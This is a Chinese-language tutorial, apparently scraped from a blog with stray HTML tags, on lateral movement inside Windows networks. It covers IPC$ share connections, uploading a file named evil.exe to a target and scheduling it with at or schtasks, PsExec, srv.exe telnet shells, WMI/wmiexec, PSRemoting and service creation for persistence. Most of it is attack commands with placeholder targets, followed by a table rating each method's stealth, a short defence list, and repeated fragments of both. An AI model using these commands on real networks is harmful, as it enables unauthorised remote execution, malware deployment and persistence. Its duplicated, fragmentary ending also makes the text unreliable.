内网渗透中的计划任务利用技术详解<\/h1>

一、IPC$共享利用<\/h2>

1.1 IPC$连接与验证<\/h3>

连接命令：<\/strong><\/p>

net use \\目标IP\IPC$ "密码"<\/span> \/user:"用户名"<\/span>
<\/span><\/span><\/code><\/pre>常见错误：<\/strong><\/p>

System error 1312<\/code>：目标未开启IPC共享或会话已终止<\/li>
<\/ul>
成功标志：<\/strong><\/p>
命令成功完成。
<\/code><\/pre>
1.2 文件传输操作<\/h3>
文件上传：<\/strong><\/p>
copy<\/span> 本地文件 \\目标IP\C$\目标路径
<\/span><\/span><\/code><\/pre>文件下载：<\/strong><\/p>
copy<\/span> \\目标IP\C$\路径\文件 本地保存路径
<\/span><\/span><\/code><\/pre>二、命令执行技术<\/h2>
2.1 计划任务利用<\/h3>
AT命令（适用于较旧Windows系统）<\/h4>
基本流程：<\/strong><\/p>

查看目标系统时间：<\/li>
<\/ol>
net time \\目标IP
<\/span><\/span><\/code><\/pre>
上传恶意文件：<\/li>
<\/ol>
copy<\/span> evil.exe \\目标IP\c$\windows\temp\evil.exe
<\/span><\/span><\/code><\/pre>
创建计划任务：<\/li>
<\/ol>
at \\目标IP 执行时间 "C:\路径\程序.exe -参数"<\/span>
<\/span><\/span><\/code><\/pre>
删除计划任务：<\/li>
<\/ol>
at \\目标IP 任务ID \/delete
<\/span><\/span><\/code><\/pre>限制：<\/strong><\/p>

容易将任务安排到第二天<\/li>
Windows Server 2008及更新版本可能不支持<\/li>
<\/ul>
Schtasks命令（更强大的替代方案）<\/h4>
创建计划任务：<\/strong><\/p>
schtasks \/create \/s 目标IP \/u 用户名 \/p 密码 \/ru "SYSTEM"<\/span> \/tn 任务名 \/sc DAILY \/st 执行时间 \/tr "执行命令"<\/span> \/F
<\/span><\/span><\/code><\/pre>执行计划任务：<\/strong><\/p>
schtasks \/run \/s 目标IP \/u 用户名 \/p 密码 \/tn 任务名
<\/span><\/span><\/code><\/pre>删除计划任务：<\/strong><\/p>
schtasks \/delete \/tn 任务名 \/f \/s 目标IP
<\/span><\/span><\/code><\/pre>优点：<\/strong><\/p>

支持更多参数和选项<\/li>
可指定运行账户（如SYSTEM）<\/li>
<\/ul>
缺点：<\/strong><\/p>

命令语法复杂<\/li>
<\/ul>
2.2 PsExec工具<\/h3>
基本用法：<\/strong><\/p>
psexec \\目标IP 执行命令
<\/span><\/span>psexec.exe \\目标IP –accepteula -u 用户名 -p 密码 -c 要复制的文件
<\/span><\/span><\/code><\/pre>可能失败原因：<\/strong><\/p>

ADMIN$共享未开启<\/li>
服务安装失败<\/li>
退出时服务删除失败<\/li>
<\/ol>
2.3 SRV工具<\/h3>
获取交互式shell：<\/strong><\/p>

创建计划任务执行srv.exe：<\/li>
<\/ol>
at \\目标IP 执行时间 srv.exe
<\/span><\/span><\/code><\/pre>
连接telnet：<\/li>
<\/ol>
telnet 目标IP 5188
<\/span><\/span><\/code><\/pre>限制：<\/strong><\/p>

需要目标开启telnet客户端服务<\/li>
可能被杀毒软件拦截<\/li>
<\/ul>
2.4 WMI技术<\/h3>
基本命令执行：<\/strong><\/p>
wmic \/node:目标IP \/user:用户名 \/password:密码 process call create "执行命令"<\/span>
<\/span><\/span><\/code><\/pre>使用wmiexec.vbs脚本：<\/strong><\/p>

获取半交互式shell：<\/li>
<\/ol>
cscript.exe \/\/nologo wmiexec.vbs \/shell 目标IP 用户名 密码
<\/span><\/span><\/code><\/pre>
执行单条命令：<\/li>
<\/ol>
cscript.exe wmiexec.vbs \/cmd 目标IP 用户名 密码 "命令"<\/span>
<\/span><\/span><\/code><\/pre>Python实现：<\/strong><\/p>
wmiexec.py 用户名:密码@目标IP
<\/span><\/span><\/code><\/pre>2.5 PowerShell远程执行(PSRemoting)<\/h3>
条件：<\/strong><\/p>

目标开启WinRM服务（监听5985\/5986端口）<\/li>
默认在Windows Server 2012+开启<\/li>
<\/ul>
基本命令：<\/strong><\/p>
Enter-PSSession 目标<\/span>IP -Credential 用户名<\/span>
<\/span><\/span><\/code><\/pre>2.6 服务控制(SC)技术<\/h3>
系统权限执行：<\/strong><\/p>
sc \\目标IP create 服务名 binpath= "执行命令"<\/span>
<\/span><\/span>sc \\目标IP start 服务名
<\/span><\/span>sc \\目标IP delete 服务名
<\/span><\/span><\/code><\/pre>指定用户权限执行：<\/strong><\/p>
sc \\目标IP create 服务名 binpath= "执行命令"<\/span> obj= 域\用户名 passwrod= 密码
<\/span><\/span>sc \\目标IP start 服务名
<\/span><\/span><\/code><\/pre>三、技术对比与选择建议<\/h2>



技术<\/th>
适用系统<\/th>
权限要求<\/th>
隐蔽性<\/th>
复杂度<\/th>
<\/tr>
<\/thead>


AT命令<\/td>
旧版Windows<\/td>
管理员<\/td>
中<\/td>
低<\/td>
<\/tr>

Schtasks<\/td>
所有Windows<\/td>
管理员<\/td>
中<\/td>
高<\/td>
<\/tr>

PsExec<\/td>
所有Windows<\/td>
管理员<\/td>
低<\/td>
中<\/td>
<\/tr>

WMI<\/td>
Windows 2000+<\/td>
管理员<\/td>
高<\/td>
中<\/td>
<\/tr>

PSRemoting<\/td>
Windows 2008R2+<\/td>
管理员<\/td>
高<\/td>
高<\/td>
<\/tr>

服务控制<\/td>
所有Windows<\/td>
管理员<\/td>
中<\/td>
中<\/td>
<\/tr>
<\/tbody>
<\/table>
选择建议：<\/strong><\/p>

对旧系统优先尝试AT命令<\/li>
对新系统使用WMI或Schtasks<\/li>
需要交互式会话时考虑SRV或PSRemoting<\/li>
需要持久化时使用服务控制技术<\/li>
<\/ol>
四、防御建议<\/h2>

限制IPC$共享访问<\/li>
监控计划任务创建和修改<\/li>
限制WMI和PSRemoting使用<\/li>
实施严格的权限控制<\/li>
监控异常服务创建和启动<\/li>
启用杀毒软件和EDR解决方案<\/li>
<\/ol>

技术<\/th>	适用系统<\/th>	权限要求<\/th>	隐蔽性<\/th>	复杂度<\/th> <\/tr> <\/thead>
AT命令<\/td>	旧版Windows<\/td>	管理员<\/td>	中<\/td>	低<\/td> <\/tr>
Schtasks<\/td>	所有Windows<\/td>	管理员<\/td>	中<\/td>	高<\/td> <\/tr>
PsExec<\/td>	所有Windows<\/td>	管理员<\/td>	低<\/td>	中<\/td> <\/tr>
WMI<\/td>	Windows 2000+<\/td>	管理员<\/td>	高<\/td>	中<\/td> <\/tr>
PSRemoting<\/td>	Windows 2008R2+<\/td>	管理员<\/td>	高<\/td>	高<\/td> <\/tr>
服务控制<\/td>	所有Windows<\/td>	管理员<\/td>	中<\/td>	中<\/td> <\/tr> <\/tbody> <\/table> 选择建议：<\/strong><\/p> 对旧系统优先尝试AT命令<\/li> 对新系统使用WMI或Schtasks<\/li> 需要交互式会话时考虑SRV或PSRemoting<\/li> 需要持久化时使用服务控制技术<\/li> <\/ol> 四、防御建议<\/h2> 限制IPC$共享访问<\/li> 监控计划任务创建和修改<\/li> 限制WMI和PSRemoting使用<\/li> 实施严格的权限控制<\/li> 监控异常服务创建和启动<\/li> 启用杀毒软件和EDR解决方案<\/li> <\/ol>

内网渗透中的计划任务利用技术详解<\/h1>

一、IPC$共享利用<\/h2>

二、命令执行技术<\/h2>

2.1 计划任务利用<\/h3>

四、防御建议<\/h2> 限制IPC$共享访问<\/li> 监控计划任务创建和修改<\/li> 限制WMI和PSRemoting使用<\/li> 实施严格的权限控制<\/li> 监控异常服务创建和启动<\/li> 启用杀毒软件和EDR解决方案<\/li> <\/ol>

四、防御建议<\/h2>

限制IPC$共享访问<\/li>
监控计划任务创建和修改<\/li>
限制WMI和PSRemoting使用<\/li>
实施严格的权限控制<\/li>
监控异常服务创建和启动<\/li>
启用杀毒软件和EDR解决方案<\/li> <\/ol>